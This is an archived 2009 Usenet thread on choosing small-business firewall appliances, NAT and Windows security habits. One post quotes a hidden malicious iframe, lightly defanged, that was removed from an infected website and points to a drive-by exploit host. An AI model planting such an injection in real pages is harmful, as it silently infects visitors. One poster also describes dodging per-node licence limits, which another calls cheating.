appliance firewall
ToddAndMargo
Can anyone recommend an appliance firewall for
a small business? Nice if it had Linux and
iptables inside.
Many thanks,
-T
Keith Keller
>
> Can anyone recommend an appliance firewall for
> a small business? Nice if it had Linux and
> iptables inside.
Anything that runs openwrt should work fine as a firewall. What exactly
do you mean by ''appliance''? Do you want it to do things other than
firewall/NAT?
--keith
--
kkeller...@wombat.san-francisco.ca.us
(try just my userid to email me)
AOLSFAQ=http://www.therockgarden.ca/aolsfaq.txt
see X- headers for PGP signature information
ToddAndMargo
> On 2009-05-07, ToddAndMargo <ToddAn...@NoSpam.verizon.net> wrote:
>> Can anyone recommend an appliance firewall for
>> a small business? Nice if it had Linux and
>> iptables inside.
>
> Anything that runs openwrt should work fine as a firewall. What exactly
> do you mean by ''appliance''?
A box that hangs on the wall. Very little user interaction, except
maybe a web page to configure it (or some such).
> Do you want it to do things other than
> firewall/NAT?
Firewall/NAT/router/port forwarding. But it must be a *real* firewall.
NAT *is not* a firewall.
-T
Keith Keller
>
> Firewall/NAT/router/port forwarding. But it must be a *real* firewall.
> NAT *is not* a firewall.
Well, then you need to define your requirements if you want a reasonable
answer.
Thad Floryan
wrote:
> [...]
> Firewall/NAT/router/port forwarding. But it must be a *real* firewall.
> NAT *is not* a firewall.
Then you might want this kind of product:
I've installed 100s over the years and not one has even been
compromised. Current home/SOHO model is TZ180; my TZ170 has
provided years of infallible service.
Their PRO series work great for medium-sized companies.
1PW
Hello Thad:
At about $293USD you buy the TZ180. Then, for $490USD per year, you
rent their software and update service. At almost $800USD for the first
year's outlay, the TZ180 needs to do a lot for a SOHO.
Regards,
Pete
--
1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]
Thad Floryan
> On 05/08/2009 02:12 AM, Thad Floryan sent:
> > compromised. Current home/SOHO model is TZ180; my TZ170 has
> > provided years of infallible service.
>
> > Their PRO series work great for medium-sized companies.
>
> Hello Thad:
>
> At about $293USD you buy the TZ180. Then, for $490USD per year, you
> rent their software and update service. At almost $800USD for the first
> year's outlay, the TZ180 needs to do a lot for a SOHO.
It actually does, but one needn't purchase all the options. The
software has been solid for years and I never purchased the long-term
update service especially since there's a great Yahoo support group,
so
the only cost (for me) has been the one-time purchase price.
Even their large rackmount units are easy to configure and are rock-
solid,
hence the appellation "appliance". Much, much easier to setup than the
comparable products from Cisco and other vendors, and even setting up
a
DMZ is trivial.
I was using one of their "SOHO 2" units for about 10+ years on dialup
and
Sprint Broadband with VPN, 3DES, etc. and the only reason I sold that
one
to a client and bought the TZ-170 was for the higher WAN speeds I now
have
available.
The only annoyance is that everything on one's LAN is "seen" as a
node,
including printers that use NTP, so a naive person would opt for the
25
node license instead of the stock 10 node license. What I did to get
around that was place a US$50 Linksys BEFSR41 Version 4.3 between the
TZ-170 and my LAN and now the TZ-170 thinks there's only one node even
though I have almost 50 systems here. :-)
FWIW, double-NAT has not caused any problems whatsoever with anything
I do on the 'Net (online banking, web surfing, even online gaming) and
there have been zero intrusions. ALso FWIW the Sonicwall products can
be
set to "stealth" mode meaning it doesn't reveal itself on the WAN.
Product longevity, reliability and low cost per year are big pluses.
It's truly a plug'n'play appliance. Mine's been up for 117 days now
and that's only because my local cable provider was offline for awhile
one evening back in February when they switched over to DOCSIS 3.0
and I didn't know what happened so I cycled the TZ-170; it normally
will stay up for years because mine is on a UPS.
Greg Russell
news:5okcd6x...@goaway.wombat.san-francisco.ca.us...
>> Can anyone recommend an appliance firewall for a small business?
>> Nice if it had Linux and iptables inside.
>
> Anything that runs openwrt should work fine as a firewall. What exactly
> do you mean by ''appliance''? Do you want it to do things other than
> firewall/NAT?
Ironing the clothes and washing the dishes would be nice. <g>
Really though, all seriousness aside, we simply use an old headless computer
with 2 network interfaces running Centos and iptables. with sshd listening
on the "inboard" interface. One could also have webmin listening, but it's
bever been necessary here. ssh and vi[m] handle all our editing needs for
the iptables.
ToddAndMargo
Thank you!
mr.b
world:
> But it must be a *real* firewall.
> NAT *is not* a firewall.
I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
--
you could google keller +slackware ... or not
ToddAndMargo
No frozen yogart?!?!?
A linux box would be way over their heads. I do this (Linux box)
for other customers, but one does have to know the limitations
of their customers.
-T
ToddAndMargo
> On Fri, 08 May 2009 05:45:13 +0000, ToddAndMargo pronounced unto the
> world:
>
>> But it must be a *real* firewall.
>> NAT *is not* a firewall.
>
> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>
I have another customer I am trying to convince he needs
a real firewall, not just a $15.00 NAT box.
Do you know of any good references I can point him to?
-T
Thad Floryan
wrote:
> [...]
> A linux box would be way over their heads. I do this (Linux box)
> for other customers, but one does have to know the limitations
> of their customers.
Exactly why appliances such as the Sonicwall products meets so
many peoples' needs. I'm not "pushing" Sonicwall's stuff though
I use them; there are other similar products from other vendors
readily available.
Google "firewall appliance" for more choices.
I've been happy with Sonicwall products for over 17 years now.
Thad Floryan
> [...]
> Google "firewall appliance" for more choices.
>
> I've been happy with Sonicwall products for over 17 years now.
For those curious what a "green" (powerwise) firewall appliance
looks like (vs. a power-hungry and failure-prone PC (with its
HD and fan(s)), here's my TZ170 atop a filing cabinet and out
of the way and silent:
<http://thadlabs.com/PIX/TZ170_appliance.jpg>
Here are some of the systems being served by it:
David Brown
*Why* do you think you need a "real" firewall, not just a $15 NAT box?
As has been said, NAT alone is not actually a firewall, but I have never
seen a NAT box that was not also a firewall. A firewall is merely a
hinder to traffic - it determines whether packets can pass through from
one interface to another (or to the device itself). A cheap NAT router
will stop packets that are trying to get in, unless they have been
explicitly allowed (using firewall rules and DNAT port forwarding).
Therefore, it *is* a firewall. It will also allow you to limit outgoing
traffic.
Of course, a cheap NAT router is not a sophisticated or advanced
firewall. It won't let you define rules such as limited numbers of
connections in a time interval (very useful for preventing dictionary
attacks on ssh, at the risk of getting a DOS), or let you automatically
blacklist addresses that attempt port scans. But it *will* do a
sufficient job for a small or simple network, and it will do it far
better than an advanced firewall - because it's simple, it's much easier
to get right.
It is correct that NAT in itself is not technically a firewall - it does
not limit or control traffic in any way. But it has the practical
functional effect of a firewall - incoming packets aimed at the firewall
that are not part of an outgoing tracked connection have nowhere to go,
and are therefore dropped (or rejected). If packets arrive at the wan
interface with an explicit target on the lan side, then a pure NAT
router would pass them on - these are not blocked by NAT. But any real
world NAT router device will block them (as these devices are also
"real" firewalls). Additionally, you can be fairly certain that your
ISP's routers and firewalls would not have passed on such packets to
your NAT router in the first place (assuming your NAT router is
connected to an ISP, obviously).
There are plenty of setups for which a $15 (or perhaps a little more -
you don't have to aim for the very cheapest) firewall/NAT router device
is *exactly* what is needed. The Internet would be a much happier place
if more people used these devices rather than connecting their windows
boxes directly to the net.
ToddAndMargo
> For those curious what a "green" (powerwise) firewall appliance
> looks like (vs. a power-hungry and failure-prone PC (with its
> HD and fan(s))
That is one of my fears from running an old, worn out
PC as a firewall. They past their useful lifespan (use
by date has been exceeded).
It is really hard to talk a (cheap) customer into buying
a new computer for a firewall. If you do, they want to
use a $400.00 piece of junk meant for the home market
and not meant to really work at all, just to be cheap.
I would love a simple Intel Atom based mini box to
run a firewall on: no fans, no mechanical hard drive,
stripped down CentOS, and two network adapters.
But, in my dreams only.
In the mean time, I will stick with appliance firewalls
for those customers who have such limitations.
-T
ToddAndMargo
> On Fri, 08 May 2009 05:45:13 +0000, ToddAndMargo pronounced unto the
> world:
>
>> But it must be a *real* firewall.
>> NAT *is not* a firewall.
>
> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>
I did not think he was. Sorry for the mis-understanding.
ToddAndMargo
> Of course, a cheap NAT router is not a sophisticated or advanced
> firewall. It won't let you define rules such as limited numbers of
> connections in a time interval (very useful for preventing dictionary
> attacks on ssh, at the risk of getting a DOS), or let you automatically
> blacklist addresses that attempt port scans. But it *will* do a
> sufficient job for a small or simple network, and it will do it far
> better than an advanced firewall - because it's simple, it's much easier
> to get right.
>
> It is correct that NAT in itself is not technically a firewall - it does
> not limit or control traffic in any way. But it has the practical
> functional effect of a firewall - incoming packets aimed at the firewall
> that are not part of an outgoing tracked connection have nowhere to go,
> and are therefore dropped (or rejected). If packets arrive at the wan
> interface with an explicit target on the lan side, then a pure NAT
> router would pass them on - these are not blocked by NAT. But any real
> world NAT router device will block them (as these devices are also
> "real" firewalls). Additionally, you can be fairly certain that your
> ISP's routers and firewalls would not have passed on such packets to
> your NAT router in the first place (assuming your NAT router is
> connected to an ISP, obviously).
NAT can be spoofed
>
> There are plenty of setups for which a $15 (or perhaps a little more -
> you don't have to aim for the very cheapest) firewall/NAT router device
> is *exactly* what is needed. The Internet would be a much happier place
> if more people used these devices rather than connecting their windows
> boxes directly to the net.
I concur completely.
It would also help if Windows users would be themselves a good software
firewall to go along with it.
I have a small business customer with several Windows computers
that only get used once a day to post a report to the Internet.
The rest of the time they are sitting there collecting viruses.
Among other things, I am trying to get him to get a real firewall.
His NAT router is not working so well. Given enough time and enough
exposure, Windows machines to have a habit of collecting viruses,
even with NAT.
-T
Thad Floryan
wrote:
> [...]
> In the mean time, I will stick with appliance firewalls
> for those customers who have such limitations.
Appliance firewalls are not just for customers with "limitations",
they're also for those who want a plug'n'play solution that can be
setup and literally almost forgotten -- time is too precious to be
spent hassling with buggy and/or error-prone software.
I've been using computers since the early 1960s, and both UNIX and
Linux since their respective day ones, and an appliance is, well,
an appliance that I don't have to worry about. :-)
I'm quite technically competent (being the last IT person at
Levanta (formerly Linuxcare) who was called in to shut the place
down on its last day of business March 31, 2008), and with a
solid firewall appliance there are simply no worries since the
product(s) is/are certified stateful packet inspectors.
Keith Keller
>>
>> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>
> I did not think he was. Sorry for the mis-understanding.
That's correct, I wasn't. I also apologize for the misunderstanding. :)
It seems like the Sonicwall solution is close to what you want (I've
never used one, but have heard good things about them from others), so
this answer won't really help you, but perhaps it'll help others.
Remember that there's a bit of confusion as to what a ''firewall'' does.
Some people believe it's just NAT; others believe it's just
NAT+iptables; still others believe it's NAT+iptables+application-level
packet filtering. So when you (or others) need these functions, you
should specify which functions you want.
Now, as for OpenWRT, it's a minimal but fairly thorough linux
distribution meant for typical residential NAT/router devices, like the
Linksys WRT54G. Since it's a linux flavor, it can do everything that
linux can do, as long as you can fit it into the memory or storage space
of the device. NAT and iptables are standard; I do not know if there is
application-level filtering available. The upshot is that anything you
can do with iptables, you can do with OpenWRT. You can also do things
that the default firmware that comes with some devices can not.
A web interface is also available. The interface for the version I
currently use is not 100% straightforward for a n00b to use, but if you
configure the device for someone to drop in, it should really be just
like an appliance for the end-user. (I'm on White Russian, so the
Kamikaze interface might be more self-explanatory.)
David Brown
> David Brown wrote:
>
>> Of course, a cheap NAT router is not a sophisticated or advanced
>> firewall. It won't let you define rules such as limited numbers of
>> connections in a time interval (very useful for preventing dictionary
>> attacks on ssh, at the risk of getting a DOS), or let you
>> automatically blacklist addresses that attempt port scans. But it
>> *will* do a sufficient job for a small or simple network, and it will
>> do it far better than an advanced firewall - because it's simple, it's
>> much easier to get right.
>>
>> It is correct that NAT in itself is not technically a firewall - it
>> does not limit or control traffic in any way. But it has the
>> practical functional effect of a firewall - incoming packets aimed at
>> the firewall that are not part of an outgoing tracked connection have
>> nowhere to go, and are therefore dropped (or rejected). If packets
>> arrive at the wan interface with an explicit target on the lan side,
>> then a pure NAT router would pass them on - these are not blocked by
>> NAT. But any real world NAT router device will block them (as these
>> devices are also "real" firewalls). Additionally, you can be fairly
>> certain that your ISP's routers and firewalls would not have passed on
>> such packets to your NAT router in the first place (assuming your NAT
>> router is connected to an ISP, obviously).
>
> NAT can be spoofed
It's possible to spoof NAT, and there are all sorts of other possible
problems that could cause trouble for your little NAT router (DOS
attacks, syn floods, whatever). But for the typical situation of a
small network connected to an ISP using one of these routers, you are
not going to get spoofed packets coming in - your ISP is going to have a
better firewall setup (if not, what are you paying them for?).
Also (for any others reading this - ToddAndMargo obviously knows) NAT
does not help for limiting outgoing traffic, or if there knowledgeable
and malicious people on the inside of the network (or between the router
and the ISP). These devices can use their firewall to limit the damage
from problems on the inside, however - in particular, you can block port
25 aimed at anything other than the ISP's mail server and thus avoid any
infected Windows machine sending out spam.
>
>>
>> There are plenty of setups for which a $15 (or perhaps a little more -
>> you don't have to aim for the very cheapest) firewall/NAT router
>> device is *exactly* what is needed. The Internet would be a much
>> happier place if more people used these devices rather than connecting
>> their windows boxes directly to the net.
>
> I concur completely.
>
> It would also help if Windows users would be themselves a good software
> firewall to go along with it.
>
I'm not so sure about the "good software firewall" part. The key point
in firewalling is to block incoming packets - windows built-in firewall
does a perfectly good job of that. I have yet to see any third-party
windows firewall software that does it better - and I have heard of many
cases of third-party firewall software having its own bugs and holes
that allow attacks through. If simple is good enough, then simple is
better than complex.
The other thing that many third-party software firewalls get wrong is
that they try too hard - the user is bombarded with questions about
applications trying to access different web sites, and quickly learns to
blindly click OK without reading the message. Finally frustrated over
so many irritating boxes, he then turns off the firewall completely.
That is why I believe software firewalls on windows are virtually
useless, with the built-in one being somewhat less useless than others.
And it is also one reason why a cheap router device is so much better
than anything software on a windows machine.
> I have a small business customer with several Windows computers
> that only get used once a day to post a report to the Internet.
> The rest of the time they are sitting there collecting viruses.
> Among other things, I am trying to get him to get a real firewall.
> His NAT router is not working so well. Given enough time and enough
> exposure, Windows machines to have a habit of collecting viruses,
> even with NAT.
>
Viruses don't get through a NAT router - you get them (mostly) from
dodgy emails, or via infected files, or occasionally from autorun
viruses on USB devices. Worms are the ones that travel directly from
machine to machine over a network, and a NAT router *will* block these
(baring theoretical but highly unlikely cases).
I would be extremely surprised if a "better" firewall would give the
slightest benefit in this case. You might be able to improve things
with some configuration of the firewall - blocking port 25 except to the
ISP's mail server is an obvious start. Changing the DNS server on the
router to OpenDNS with restricted access would also help. But the
biggest changes are to the windows machines themselves, and more
importantly, to the users.
The key rules for using a windows machine safely are:
Never connect one directly to the internet (always use a NAT router
device, or a *nix machine with a firewall).
Never use Internet Explorer (except if it is totally unavoidable, and
then only for that one particular site). Use Firefox or Opera. Also
lock down Internet Explorer with its highest security settings, since
there is no way to remove it entirely. Remove the desktop icon and
start menu entry for it - that stops most amateurs.
Never use Outlook Express or Outlook for email from external sources.
They are far too happy to run attached malware or visit malware links,
and they freely give out all contact information to any malware that
asks. Thunderbird is my email client of choice, but there are other
options.
Ensure that all incoming email has passed through a good anti-virus
filter (not on the PC itself, but at the ISP or email server). If
possible, have the filter strip all executable attachments (exe, dll,
scr, bat, cpl, com, cmd).
Ensure that the "hide extensions of known file types" option is off for
*all* directories.
No PC's from outside are ever allowed on the internal LAN. No PC's on
the LAN are ever allowed to connect to any other networks. If someone
needs a portable that must be connected to other networks, assume it is
always infected and never give it direct contact with other computers.
Make sure the users understand these rules, and the importance of them -
and equate breaking these rules with leaving the building unlocked.
Make sure that they understand the importance of responsible net usage -
visiting "adult entertainment" sites from work computers is no more
acceptable than inviting "adult entertainment" visitors into the
building. OpenDNS can help enforce this (and avoid accidents).
Make sure that they understand the importance of reporting problems or
suspected problems with the machines, and that it is far better to
report accidental security problems (typos when entering web addresses
are easy to do) than to try to cover it up.
Note that I don't include any of the "traditional" rules, such as
anti-virus software, software firewalls, or automatic windows updates on
this list.
Until your windows machines and their users are this safe, your worries
about a better firewall than a cheap NAT router are wasted effort.
mvh.,
David
David Brown
> On 2009-05-08, ToddAndMargo <ToddAn...@NoSpam.verizon.net> wrote:
>> mr.b wrote:
>>> I'm fairly certain Mr. Keller wasn't suggesting that NAT=firewall
>> I did not think he was. Sorry for the mis-understanding.
>
> That's correct, I wasn't. I also apologize for the misunderstanding. :)
>
> It seems like the Sonicwall solution is close to what you want (I've
> never used one, but have heard good things about them from others), so
> this answer won't really help you, but perhaps it'll help others.
>
> Remember that there's a bit of confusion as to what a ''firewall'' does.
> Some people believe it's just NAT; others believe it's just
> NAT+iptables; still others believe it's NAT+iptables+application-level
> packet filtering. So when you (or others) need these functions, you
> should specify which functions you want.
>
> Now, as for OpenWRT, it's a minimal but fairly thorough linux
> distribution meant for typical residential NAT/router devices, like the
> Linksys WRT54G. Since it's a linux flavor, it can do everything that
> linux can do, as long as you can fit it into the memory or storage space
> of the device. NAT and iptables are standard; I do not know if there is
> application-level filtering available. The upshot is that anything you
> can do with iptables, you can do with OpenWRT. You can also do things
> that the default firmware that comes with some devices can not.
>
The two features I particularly like with OpenWRT (rather than the
standard WRT54GL firmware) are OpenVPN support, and VLANs. You can
treat each LAN port as a separate NIC rather than as a switch, thus
isolating network segments (except as allowed by your firewall). This
means, for example, that your teenage kid's machines can be on a
separate LAN from your "serious" PC. And OpenVPN support makes it very
easy to set up VPNs - a WRT54GL makes a perfectly good OpenVPN server or
client. Combining these you can have one Ethernet port that is
effectively connected to a remote LAN while the others are ordinary
NAT'ed ports.
> A web interface is also available. The interface for the version I
> currently use is not 100% straightforward for a n00b to use, but if you
> configure the device for someone to drop in, it should really be just
> like an appliance for the end-user. (I'm on White Russian, so the
> Kamikaze interface might be more self-explanatory.)
>
Kamikaze itself doesn't have a very newbie-friendly interface either,
although I believe there is a nicer web interface available. There are
several other related firewall distros for these sorts of devices, some
of which have easier configuration. Personally, I prefer a nice ssh and
shell access to a web interface, so I haven't looked too hard at these.
Robert
Why do you say that? NAT is part of the firewall.
I believe you are looking at this all wrong. What external services do
you need to be able to access the inside? If nothing you can only
strengthen the firewall by using NAT'ing. Nothing should ever need access
to the inside network if you are doing things properly.
--
Regards
Robert
Linux User #296285
http://counter.li.org
ToddAndMargo
I heard it rumored that w7rc has a button to remove IE. But
have not been able to verify it.
-T
David Brown
I've kept my company's network of about 50 windows PC's (the Linux
servers and occasional Linux desktop don't really count, as they are too
easy to keep safe) almost entirely malware-free for about 15 years using
basically these rules, and wire-cutters for those who disobey. The only
serious virus problem we ever had was a Word and Excel macro virus -
that was before we switched to OpenOffice as the standard office package.
> I heard it rumored that w7rc has a button to remove IE. But
> have not been able to verify it.
>
Don't believe it - IE is ingrained in windows. They can hide the icon,
but they can't remove the html engine that blindly does whatever a
malware site asks, and in particular the ActiveX system which is
fundamentally broken from a security viewpoint.
Thad Floryan
<david.br...@hesbynett.removethisbit.no> wrote:
> ToddAndMargo wrote:
> [...]
> > I heard it rumored that w7rc has a button to remove IE. But
> > have not been able to verify it.
>
> Don't believe it - IE is ingrained in windows. They can hide the icon,
> but they can't remove the html engine that blindly does whatever a
That's for sure. The IFRAME exploit is appearing on a lot of
websites since early April 2009. Following is an actual sample
of code I removed recently from one person's infected website,
with a space between "." and "cn" for safety:
... iframe src="http://hotslotpot. cn/in.cgi?income64"
width=1 height=1 style="visibility: hidden"></iframe ...
Basically, the above silently downloads either a PDF or a SWF
file (after interrogating the browser's plugins) and performs
a buffer overflow exploit akin to the Morris Internet Worm of
1988. The exploit uses Adobe Reader (all versions since at
least 6.* up to the latest version 9.1.0) and executes malware
on the client system. This affects Linux, too; here's just one
example re: Gentoo:
<http://seclists.org/bugtraq/2009/Apr/0190.html>
No system is truly safe from attacks like the above exploit.
David Brown
That's a nasty security hole! It also shows that Linux systems are not
impervious to malware (though they are *much* safer, and certainly don't
need anti-virus software and all the other "security" junk windows users
often believe helps).
It's a shame that Adobe has tried to turn the pdf format from something
it did extremely well (acting as an efficient and portable electronic
printout format) into something totally unsuited. It doesn't take a
genius to understand that increasing scripting in a format makes it more
likely to have security problems.
Fortunately, there are alternatives to Acrobat Reader, such as Evince,
kpdf and okular for Linux, and Foxit for Windows (I recently started
using Foxit on Windows - it's incredible how much faster and lighter it
is than Acrobat).
I'd also like to point out that it is problems like this that make
Outlook Express and Outlook such a bad choice for an email program on
Windows. Not only do they use IE to display html emails, but they fetch
such external links automatically. The main issue is a privacy one -
spam often has links to images that are fetched from external servers,
which then lets the server know that the spammed address is correct, and
that someone is reading it. But if you have a bug in your jpeg
libraries, this can also be a security issue. Thunderbird, on the other
hand, will not load such external images unless you explicitly ask it to.
ToddAndMargo
> That's a nasty security hole! It also shows that Linux systems are not
> impervious to malware (though they are *much* safer, and certainly don't
> need anti-virus software and all the other "security" junk windows users
> often believe helps).
Here is a link that nicely backs up your statement. It is the
test results on various Anti Viruses.
http://www.anti-malware-test.com/
Note the best you can get is 61% without a lot of false positives.
Yikes!
-T
Mark Hobley
> NAT can be spoofed
I think even the cheap boxes have anti-spoofing facilities built in.
One of the differences between a traditional router and a firewall router is
to do with that way that UDP is forwarded. A traditional NAT router will
forward UDP reply packets on non-forwarded ports to an associated host and
there is no facility within the router to control this. A firewall router
provides the additional control facilities.
Mark.
--
Mark Hobley
Linux User: #370818 http://markhobley.yi.org/
1PW
Hello Thad:
I appreciate the thoughtful rebuttal. Your good experience has
obviously made you a supporter. Even at about $300, it's hard for /me/
to justify the outlay for the TZ-180. Particularly when other
residential grade routers are as inexpensive as they are.
I apologize for incomplete research. However, can a "registered" user
expect any kind of ongoing software support for a TZ-180 even though
they haven't yet purchased a 10-node license?
Thank you,
Thad Floryan
> On 05/08/2009 05:21 AM, Thad Floryan sent:
> > Product longevity, reliability and low cost per year are big pluses.
> > It's truly a plug'n'play appliance. Mine's been up for 117 days now
> > and that's only because my local cable provider was offline for awhile
> > one evening back in February when they switched over to DOCSIS 3.0
> > and I didn't know what happened so I cycled the TZ-170; it normally
> > will stay up for years because mine is on a UPS.
>
> Hello Thad:
>
> I appreciate the thoughtful rebuttal. Your good experience has
> obviously made you a supporter. Even at about $300, it's hard for /me/
> to justify the outlay for the TZ-180. Particularly when other
> residential grade routers are as inexpensive as they are.
You get what you pay for. For a revealing look at how vulnerable the
"residential grade routers" really are:
<http://www.sourcesec.com/Lab/soho_router_report.pdf>
and that's just the tip of the iceberg. I see those and similar
problems all the time. And even some "pro" devices have more than
their share of problems and vulnerabilities (think IOS from a bug,
er, big name in Internet hardware :-)
I simply haven't seen those kinds of problems with the Sonicwall
devices in the 17 years I've been using them, and I've personally
installed 100s at client sites over the years and I've never had a
client's site comprimized. Ever.
> I apologize for incomplete research. However, can a "registered" user
> expect any kind of ongoing software support for a TZ-180 even though
> they haven't yet purchased a 10-node license?
The 10-node license is part of the basic unit. Back in the "old days"
Sonicwall provided lifetime software support, but as the company grew
and "bean counters" infiltrated the company, they went to the present
pricing scam, er, scheme similar to what 1000s of other companies do.
Their policy is here: <http://www.sonicwall.com/us/support/3003.html>
The hue and cry when they dropped the "lifetime" still leaves my ears
ringing after 6 or 7 years now.
FWIW, the basic software in the appliance is rock solid and I haven't
seen any need to get onto a support contract for my purposes. Most of
the updates and such are new features primarily for accounting and
some
other things that have nothing whatsoever to do with the primary
purpose
of the product: being an excellent firewall (and NAT and DMZ etc
device).
That's why it costs ~ US$300 and not the US$50 of the typical
"residential
grade router". It does a lot more than "just" routing and firewalling,
and
I've had to buy only two Sonicwall devices for myself in 17 years --
the
upgrade to the TZ-170 was o accomodate higher WAN speeds. 100BaseTX
didn't
even exist when I bought my first Sonicwall appliance. :-)
David Brown
> On May 11, 4:32 am, 1PW <barcrnahgjuvf...@nby.pbz> wrote:
>> On 05/08/2009 05:21 AM, Thad Floryan sent:
>> [...]
>>> Product longevity, reliability and low cost per year are big pluses.
>>> It's truly a plug'n'play appliance. Mine's been up for 117 days now
>>> and that's only because my local cable provider was offline for awhile
>>> one evening back in February when they switched over to DOCSIS 3.0
>>> and I didn't know what happened so I cycled the TZ-170; it normally
>>> will stay up for years because mine is on a UPS.
>> Hello Thad:
>>
>> I appreciate the thoughtful rebuttal. Your good experience has
>> obviously made you a supporter. Even at about $300, it's hard for /me/
>> to justify the outlay for the TZ-180. Particularly when other
>> residential grade routers are as inexpensive as they are.
>
> You get what you pay for. For a revealing look at how vulnerable the
> "residential grade routers" really are:
>
> <http://www.sourcesec.com/Lab/soho_router_report.pdf>
>
These attacks are either by malicious users on the *inside* of the
network, or simply weak passwords or WLAN encryption. Using a good WLAN
encryption and password is always important - you need to configure that
for any firewall/router. But for devices at this level, vulnerabilities
from the inside are totally irrelevant to security.
If you *do* need to protect from malicious people on the inside, you
have far bigger problems than your firewall, and no SonicWall, Cisco, or
any other standard device at any price is going to do the job - you need
a network expert, not an off-the-shelf solution.
> and that's just the tip of the iceberg. I see those and similar
> problems all the time. And even some "pro" devices have more than
> their share of problems and vulnerabilities (think IOS from a bug,
> er, big name in Internet hardware :-)
>
> I simply haven't seen those kinds of problems with the Sonicwall
> devices in the 17 years I've been using them, and I've personally
> installed 100s at client sites over the years and I've never had a
> client's site comprimized. Ever.
>
*No one* sees these problems (other than the weak encryption and
passwords) in real life - they are hypothetical and require
knowledgeable and malicious attackers on the inside. In networks where
that is realistic (such as at universities), you have experts running
the security, and they don't use ready-made ready-configured firewalls.
I've seen Sonicwall's in use. They work fine, and do a good job - but
are pretty expensive for what they do. I personally would not recommend
a firewall/router that had some artificial limit on the number of nodes
or users (and I certainly wouldn't consider "cheating" to get round
these limits - if you think the functionality is worth paying for it,
pay for it). And I wouldn't recommend a system that required annual
fees to keep working (paying annually for support is fair enough,
obviously).
If you really need something better than a cheapo firewall/router, then
get a slightly more expensive one - SonicWall is one option, as are
Zyxel, LinkSys, and a host of other options. *None* are significantly
more secure than the others, in that *all* do a perfectly good job of
keep out packets from the outside. They vary in speed, features,
configuration interfaces, etc. For some uses, additional features such
as accountancy and user management are worth paying for - though they
have nothing to do with security.
If you want more than that, get a Linux box and learn iptables. I can
set up my LinkSys WRT54GL to something more flexible and at least as
secure as anything you can buy from SonicWall at any price - because I
run Linux on it and control it myself.
clay
>...
>
> Ensure that the "hide extensions of known file types" option is off for
> *all* directories.
[for those who weren't aware]
Even with this option (de)selected*, Windows still hides extensions.
Some that are executable.
.pif. .shs, .lnk, etc. are still hidden.
To actually show _all_ extensions, remove the registry entries:
NeverShowExt
There's a bunch of them.
All useless warnings about messing in the registry apply.
Google it first and learn more.
*That it's not *off* by default is proof that Microsoft cares little
about security.
David Brown
> David Brown wrote:
>> ...
>>
>> Ensure that the "hide extensions of known file types" option is off
>> for *all* directories.
>> ...
>
> [for those who weren't aware]
> Even with this option (de)selected*, Windows still hides extensions.
> Some that are executable.
> .pif. .shs, .lnk, etc. are still hidden.
>
> To actually show _all_ extensions, remove the registry entries:
> NeverShowExt
> There's a bunch of them.
>
I knew these were still hidden - I didn't know it was possible to show
them. Thanks for the tip!
Thad Floryan
<david.br...@hesbynett.removethisbit.no> wrote:
> Thad Floryan wrote:
> [...]
> > <http://www.sourcesec.com/Lab/soho_router_report.pdf>
>
> These attacks are either by malicious users on the *inside* of the
> network, or simply weak passwords or WLAN encryption. Using a good WLAN
> encryption and password is always important - you need to configure that
> for any firewall/router. But for devices at this level, vulnerabilities
> from the inside are totally irrelevant to security.
>
> If you *do* need to protect from malicious people on the inside, you
> have far bigger problems than your firewall, and no SonicWall, Cisco, or
> any other standard device at any price is going to do the job - you need
> a network expert, not an off-the-shelf solution.
For sure. :-)
We're getting a wee bit off-topic for this forum -- this discussion
should be in comp.os.linux.security.
Do note that attacks seemingly originating on the inside (LAN) can
be silently initiated by malware on the outside (WAN) thanks to Java,
ActiveX, and other scripting on visited web sites such as the IFRAME
exploit I mentioned several days ago.
For the few Windows systems I do have, the Firefox plugin NoScript
stops such malware dead. NoScript provides examination of what it
finds and permits (un)conditional continuation or total blocking.
What I found interesting fixing the IFRAME exploit for several
people (using Win boxes) was that AVG is the only AV program that
blocks web sites with the IFRAME exploit due to its methodology
which apparently differs from that of Norton/Symantec , McAfee, etc.
I found the IFRAME exploit clever because the silently downloaded
malware from China changes several times a day which is very
problematic for AV programs seeking invariant "signatures".
David Brown
> On May 11, 7:14 am, David Brown
> <david.br...@hesbynett.removethisbit.no> wrote:
>> Thad Floryan wrote:
>> [...]
>>> <http://www.sourcesec.com/Lab/soho_router_report.pdf>
>> These attacks are either by malicious users on the *inside* of the
>> network, or simply weak passwords or WLAN encryption. Using a good WLAN
>> encryption and password is always important - you need to configure that
>> for any firewall/router. But for devices at this level, vulnerabilities
>> from the inside are totally irrelevant to security.
>>
>> If you *do* need to protect from malicious people on the inside, you
>> have far bigger problems than your firewall, and no SonicWall, Cisco, or
>> any other standard device at any price is going to do the job - you need
>> a network expert, not an off-the-shelf solution.
>> [...]
>
> For sure. :-)
>
> We're getting a wee bit off-topic for this forum -- this discussion
> should be in comp.os.linux.security.
>
Or possibly comp.os.windows.security, if such an oxymoronic newsgroup
exists...
> Do note that attacks seemingly originating on the inside (LAN) can
> be silently initiated by malware on the outside (WAN) thanks to Java,
> ActiveX, and other scripting on visited web sites such as the IFRAME
> exploit I mentioned several days ago.
>
In most cases, the target is on the inside too - the main reason to
attack firewalls and routers is to break in. If your code is already
running on a PC on the lan, the only real reason for attacking the
firewall is to open a few ports (rather than having to have the zombie
PC make contact with external servers). If you have UPNP running on the
firewall/router (as many do by default), then there is no need to attack
it - you can open ports just by asking nicely.
> For the few Windows systems I do have, the Firefox plugin NoScript
> stops such malware dead. NoScript provides examination of what it
> finds and permits (un)conditional continuation or total blocking.
>
NoScript is useful if you are visiting dangerous areas of the Internet
underworld, but normally javascript is fairly safe on Firefox. Firefox
will not automatically download and run executable files, and its
javascript (and java) is sandboxed. It is also regularly updated, and
updates don't need reboots or "windows genuine advantage" nonsense,
don't muck up the rest of your system, and don't get saved up for a once
a month update, unlike certain other well-known windows browsers. I
don't mean to say that browsing with Firefox and javascript is risk-free
- no graphics browser is (remember when there was a security flaw in the
jpeg libraries in windows?). But it is low risk for normal use.
> What I found interesting fixing the IFRAME exploit for several
> people (using Win boxes) was that AVG is the only AV program that
> blocks web sites with the IFRAME exploit due to its methodology
> which apparently differs from that of Norton/Symantec , McAfee, etc.
>
> I found the IFRAME exploit clever because the silently downloaded
> malware from China changes several times a day which is very
> problematic for AV programs seeking invariant "signatures".
